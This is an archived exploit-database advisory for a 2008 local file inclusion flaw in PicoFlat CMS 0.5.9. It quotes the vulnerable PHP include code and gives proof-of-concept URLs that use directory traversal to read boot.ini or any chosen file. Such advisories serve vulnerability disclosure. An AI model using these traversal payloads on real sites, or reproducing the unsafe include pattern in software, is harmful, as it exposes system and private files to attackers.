PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty win

2008-05-29T00:00:00
ID EDB-ID:5690
Type exploitdb
Reporter gmda
Modified 2008-05-29T00:00:00

Description

PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win). CVE-2008-6604. Webapps exploit for php platform

                                        
                                            ---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda

<!-- gmda@email.it -->


---------------------------------------------------------------------------

bug code

<?php             if (eregi('://', $pagina) || eregi('\?', $pagina)) {
                $pagina = "";
                include "notfound.php";
            }else{
                include $pagina;             }
        ?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]

# milw0rm.com [2008-05-29]